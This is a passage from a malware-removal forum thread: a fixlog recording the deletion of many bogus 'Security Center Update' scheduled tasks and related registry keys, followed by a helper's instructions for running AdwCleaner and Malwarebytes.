"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{29FD53A0-B0E0-4AC5-A535-A77BDBAB7300}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{29FD53A0-B0E0-4AC5-A535-A77BDBAB7300}" => Key deleted successfully.
C:\Windows\System32\Tasks\Security Center Update - 1511213846 => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Security Center Update - 1511213846" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{34D40EAE-6659-4B8C-8F0E-5D9D8F76EE87}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{34D40EAE-6659-4B8C-8F0E-5D9D8F76EE87}" => Key deleted successfully.
C:\Windows\System32\Tasks\Security Center Update - 3665910781 => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Security Center Update - 3665910781" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{38AD3EE9-89B1-4FE8-BD3A-C268041E30AB}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{38AD3EE9-89B1-4FE8-BD3A-C268041E30AB}" => Key deleted successfully.
C:\Windows\System32\Tasks\Security Center Update - 3379427597 => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Security Center Update - 3379427597" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{46591690-E2C7-4AB5-90B8-0807BF83FA2E}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{46591690-E2C7-4AB5-90B8-0807BF83FA2E}" => Key deleted successfully.
C:\Windows\System32\Tasks\Security Center Update - 1219234967 => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Security Center Update - 1219234967" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{4FE7F4B5-6216-4BF5-B69B-AE6DCAB85ACC}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{4FE7F4B5-6216-4BF5-B69B-AE6DCAB85ACC}" => Key deleted successfully.
C:\Windows\System32\Tasks\Security Center Update - 951185298 => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Security Center Update - 951185298" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{506490F7-3376-4EFC-A901-586AA3303B44}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{506490F7-3376-4EFC-A901-586AA3303B44}" => Key deleted successfully.
C:\Windows\System32\Tasks\Security Center Update - 2325803103 => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Security Center Update - 2325803103" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{516E887F-D9AA-43E6-A51E-2905BC435DC3}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{516E887F-D9AA-43E6-A51E-2905BC435DC3}" => Key deleted successfully.
C:\Windows\System32\Tasks\Security Center Update - 1528112639 => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Security Center Update - 1528112639" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{58DBAADD-4BFC-48F9-A19E-02A3DBE8DB7A}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{58DBAADD-4BFC-48F9-A19E-02A3DBE8DB7A}" => Key deleted successfully.
C:\Windows\System32\Tasks\Security Center Update - 2901739987 => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Security Center Update - 2901739987" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{62015E40-868F-450C-BB00-4F2987356F87}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{62015E40-868F-450C-BB00-4F2987356F87}" => Key deleted successfully.
C:\Windows\System32\Tasks\Security Center Update - 3903236305 => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Security Center Update - 3903236305" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{636CB7B6-8835-4A64-A923-ED55EB0D8640}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{636CB7B6-8835-4A64-A923-ED55EB0D8640}" => Key deleted successfully.
C:\Windows\System32\Tasks\Security Center Update - 2512843633 => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Security Center Update - 2512843633" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{6378A9C8-1406-4725-9242-44BFD048B5CE}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{6378A9C8-1406-4725-9242-44BFD048B5CE}" => Key deleted successfully.
C:\Windows\System32\Tasks\Security Center Update - 331106455 => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Security Center Update - 331106455" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{639A2A23-A522-40F7-AD5D-9F1245DF1A82}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{639A2A23-A522-40F7-AD5D-9F1245DF1A82}" => Key deleted successfully.
C:\Windows\System32\Tasks\Security Center Update - 2487970780 => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Security Center Update - 2487970780" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{6BB0DD4F-FC46-49AF-B590-4F9F44C7E1A7}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{6BB0DD4F-FC46-49AF-B590-4F9F44C7E1A7}" => Key deleted successfully.
C:\Windows\System32\Tasks\rspahma => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\rspahma" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{70C6EC5A-CD9A-41DE-8073-EBF9E70D4E54}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{70C6EC5A-CD9A-41DE-8073-EBF9E70D4E54}" => Key deleted successfully.
C:\Windows\System32\Tasks\Security Center Update - 3838766864 => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Security Center Update - 3838766864" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{72165FBF-954D-4040-B5B5-BC5F9EED3A0E}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{72165FBF-954D-4040-B5B5-BC5F9EED3A0E}" => Key deleted successfully.
C:\Windows\System32\Tasks\Security Center Update - 3216473386 => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Security Center Update - 3216473386" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{7430F638-B12A-445A-BBEF-5E8F514DF753}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{7430F638-B12A-445A-BBEF-5E8F514DF753}" => Key deleted successfully.
C:\Windows\System32\Tasks\Security Center Update - 699896687 => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Security Center Update - 699896687" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{7444E2A1-12CB-40A5-B56A-3E21543B4514}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{7444E2A1-12CB-40A5-B56A-3E21543B4514}" => Key deleted successfully.
C:\Windows\System32\Tasks\Security Center Update - 3204526539 => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Security Center Update - 3204526539" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{797B7B84-6E57-4129-A6A9-7A7099782A48}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{797B7B84-6E57-4129-A6A9-7A7099782A48}" => Key deleted successfully.
C:\Windows\System32\Tasks\Security Center Update - 242654636 => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Security Center Update - 242654636" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{7BB4C936-AFE9-405B-8288-876487348757}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{7BB4C936-AFE9-405B-8288-876487348757}" => Key deleted successfully.
C:\Windows\System32\Tasks\Security Center Update - 116467704 => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Security Center Update - 116467704" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{7E32FCE3-C859-49A2-8E75-598B56230006}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{7E32FCE3-C859-49A2-8E75-598B56230006}" => Key deleted successfully.
C:\Windows\System32\Tasks\Security Center Update - 4028262528 => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Security Center Update - 4028262528" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{833517E7-60C9-4EBA-B5E2-E1A24D86CE1A}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{833517E7-60C9-4EBA-B5E2-E1A24D86CE1A}" => Key deleted successfully.
C:\Windows\System32\Tasks\Security Center Update - 2519066445 => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Security Center Update - 2519066445" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{86BAB3C1-BEB4-4F5B-9723-D319FC15EB44}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{86BAB3C1-BEB4-4F5B-9723-D319FC15EB44}" => Key deleted successfully.
C:\Windows\System32\Tasks\Security Center Update - 1810362612 => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Security Center Update - 1810362612" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{8A4EFB2F-EFF1-4B4C-A1E0-641064B8C832}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{8A4EFB2F-EFF1-4B4C-A1E0-641064B8C832}" => Key deleted successfully.
C:\Windows\System32\Tasks\Security Center Update - 3747167081 => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Security Center Update - 3747167081" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{91474FF9-C8FF-4F7E-B671-C5BAA856571C}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{91474FF9-C8FF-4F7E-B671-C5BAA856571C}" => Key deleted successfully.
C:\Windows\System32\Tasks\Security Center Update - 513270047 => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Security Center Update - 513270047" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{9A50C6A9-6D3C-4A7F-B237-D2E34D535BAF}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{9A50C6A9-6D3C-4A7F-B237-D2E34D535BAF}" => Key deleted successfully.
C:\Windows\System32\Tasks\Security Center Update - 4149247359 => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Security Center Update - 4149247359" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{9BD8C08F-7F0B-430E-AD7D-12988F4D4D76}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{9BD8C08F-7F0B-430E-AD7D-12988F4D4D76}" => Key deleted successfully.
C:\Windows\System32\Tasks\Security Center Update - 1179286971 => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Security Center Update - 1179286971" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{9CD254AC-60CC-41FE-B8C7-884BAC0FA4A3}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{9CD254AC-60CC-41FE-B8C7-884BAC0FA4A3}" => Key deleted successfully.
C:\Windows\System32\Tasks\Security Center Update - 1285267939 => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Security Center Update - 1285267939" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{9DB27102-BD01-4DBA-AA72-192BAC09BFE7}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{9DB27102-BD01-4DBA-AA72-192BAC09BFE7}" => Key deleted successfully.
C:\Windows\System32\Tasks\Security Center Update - 3201999599 => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Security Center Update - 3201999599" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{A24B621A-54AB-4FAF-9C35-FB0D87321DD4}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{A24B621A-54AB-4FAF-9C35-FB0D87321DD4}" => Key deleted successfully.
C:\Windows\System32\Tasks\Security Center Update - 1259602875 => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Security Center Update - 1259602875" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{A31D10D4-B4CF-4475-B02B-0A9BEB4E6617}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{A31D10D4-B4CF-4475-B02B-0A9BEB4E6617}" => Key deleted successfully.
C:\Windows\System32\Tasks\Security Center Update - 2329648882 => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Security Center Update - 2329648882" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{A3FB09EC-C469-45ED-8A04-7E9497A4358B}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{A3FB09EC-C469-45ED-8A04-7E9497A4358B}" => Key deleted successfully.
C:\Windows\System32\Tasks\Security Center Update - 532629427 => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Security Center Update - 532629427" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{ACE571AA-4750-4BA4-9AB7-285B651F13E4}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{ACE571AA-4750-4BA4-9AB7-285B651F13E4}" => Key deleted successfully.
C:\Windows\System32\Tasks\Security Center Update - 578871115 => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Security Center Update - 578871115" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{B1AE1850-9814-4733-A837-1BCFDCA93C2F}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B1AE1850-9814-4733-A837-1BCFDCA93C2F}" => Key deleted successfully.
C:\Windows\System32\Tasks\Security Center Update - 1433702555 => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Security Center Update - 1433702555" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{B2111A5C-17C6-42AC-8232-C4BFBD5CEAE2}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B2111A5C-17C6-42AC-8232-C4BFBD5CEAE2}" => Key deleted successfully.
C:\Windows\System32\Tasks\Security Center Update - 2786531556 => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Security Center Update - 2786531556" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{B31AB263-6E64-4AE6-9131-F03F3EB11C96}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B31AB263-6E64-4AE6-9131-F03F3EB11C96}" => Key deleted successfully.
C:\Windows\System32\Tasks\Security Center Update - 2649167008 => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Security Center Update - 2649167008" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{B69D26CC-F736-43EF-8678-4047B1182B5E}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B69D26CC-F736-43EF-8678-4047B1182B5E}" => Key deleted successfully.
C:\Windows\System32\Tasks\Security Center Update - 4109173847 => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Security Center Update - 4109173847" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{BA2069FF-78E4-45BC-B55E-CD0ACD43F066}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{BA2069FF-78E4-45BC-B55E-CD0ACD43F066}" => Key deleted successfully.
C:\Windows\System32\Tasks\Security Center Update - 2002689914 => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Security Center Update - 2002689914" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{BB68D13D-D1D6-492F-8D8C-218D8F32F366}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{BB68D13D-D1D6-492F-8D8C-218D8F32F366}" => Key deleted successfully.
C:\Windows\System32\Tasks\Security Center Update - 3566967998 => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Security Center Update - 3566967998" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{C0214B00-381D-48C6-8657-2096534B77ED}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C0214B00-381D-48C6-8657-2096534B77ED}" => Key deleted successfully.
C:\Windows\System32\Tasks\Security Center Update - 2047020247 => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Security Center Update - 2047020247" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{C8F0BD03-484C-4EA4-B730-E73FCF57C579}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C8F0BD03-484C-4EA4-B730-E73FCF57C579}" => Key deleted successfully.
C:\Windows\System32\Tasks\Security Center Update - 1058146964 => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Security Center Update - 1058146964" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{CCE07978-A743-41CE-84CE-1E73B09468DB}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{CCE07978-A743-41CE-84CE-1E73B09468DB}" => Key deleted successfully.
C:\Windows\System32\Tasks\Security Center Update - 4056442320 => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Security Center Update - 4056442320" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{D272D6E1-FF48-4D29-8FED-3859A8299DC8}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{D272D6E1-FF48-4D29-8FED-3859A8299DC8}" => Key deleted successfully.
C:\Windows\System32\Tasks\Security Center Update - 446489216 => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Security Center Update - 446489216" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{DAF472B5-87C9-4EB7-BD1F-23897D28E7CF}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{DAF472B5-87C9-4EB7-BD1F-23897D28E7CF}" => Key deleted successfully.
C:\Windows\System32\Tasks\Security Center Update - 4131681425 => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Security Center Update - 4131681425" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{DD416C59-DA11-4673-95DF-6CCB71853F43}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{DD416C59-DA11-4673-95DF-6CCB71853F43}" => Key deleted successfully.
C:\Windows\System32\Tasks\Security Center Update - 2300971329 => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Security Center Update - 2300971329" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{F0BDD635-04A8-43FD-B541-D9182F90415D}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{F0BDD635-04A8-43FD-B541-D9182F90415D}" => Key deleted successfully.
C:\Windows\System32\Tasks\Security Center Update - 4105554909 => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Security Center Update - 4105554909" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{F9426B1C-C5B8-43C1-9B81-F5F6932587E9}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{F9426B1C-C5B8-43C1-9B81-F5F6932587E9}" => Key deleted successfully.
C:\Windows\System32\Tasks\Security Center Update - 700698430 => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Security Center Update - 700698430" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{FA7D302B-25B4-4938-976B-AFD59ED105BC}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{FA7D302B-25B4-4938-976B-AFD59ED105BC}" => Key deleted successfully.
C:\Windows\System32\Tasks\Security Center Update - 3992158093 => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Security Center Update - 3992158093" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{FDF8C72F-4705-4C83-B0F3-47690D02FCBE}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{FDF8C72F-4705-4C83-B0F3-47690D02FCBE}" => Key deleted successfully.
C:\Windows\System32\Tasks\Security Center Update - 4183678770 => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Security Center Update - 4183678770" => Key deleted successfully.
"HKU\S-1-5-21-1427692388-1042374531-2795145444-1001\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32" => Key deleted successfully.
"HKU\S-1-5-21-1427692388-1042374531-2795145444-1001\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" => Key deleted successfully.
HKU\S-1-5-21-1427692388-1042374531-2795145444-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5} => Key not found. 
 
=> Result of Scheduled Files to move (Boot Mode: Safe Mode (with Networking)) (Date&Time: 2015-02-24 06:09:16)<=
 
"C:\Users\Dorothy01\AppData\Roaming\????" => Directory could not move.
 
==== End of Fixlog 06:09:16 ====

  • 0

#7
dbreeze

dbreeze

    Trusted Helper

  • Malware Removal
  • 2,213 posts
Let's see if we can get that last bit of process eating identified and removed ....

First, a AdwCleaner scan >>>>

AdwCleaner by Xplode

Download AdwCleaner from here or from here. Save the file to the desktop.

NOTE: If you are using IE 8 or above you may get a warning that stops the program from downloading. Just click on the warning and allow the download to complete.

Close all open windows and browsers.
  • Vista/7/8 users: Right click the AdwCleaner icon on the desktop, click Run as administrator and accept the UAC prompt to run AdwCleaner.
    You will see the following console:

    AdwScan.jpg?
  • Click the Scan button and wait for the scan to finish.
  • After the Scan has finished the window may or may not show what it found and above, in the progress bar, you will see: Pending. Please uncheck elements you don't want to remove.
  • When the Scan has finished the Scan button will be grayed out and the Clean button will be activated.
  • Click the Clean button.
  • Everything checked will be deleted.
  • When the program has finished cleaning a report appears.
  • Once done it will ask to reboot, allow this

    adwcleaner_delete_restart.jpg
  • On reboot a log will be produced please copy / paste that in your next reply. This report is also saved to C:\AdwCleaner\AdwCleaner[S0].txt
Optional:

NOTE: If you see AVG Secure Search being targeted for deletion, Here's Why and Here. You can always Reinstall it.


Second, scan with MalwareBytes Antimalware >>>>

Malwarebytes' Anti-Malware
Please start Malwarebytes' Anti-Malware from either the Start Menu shortcut or your desktop shortcut (if you have one).
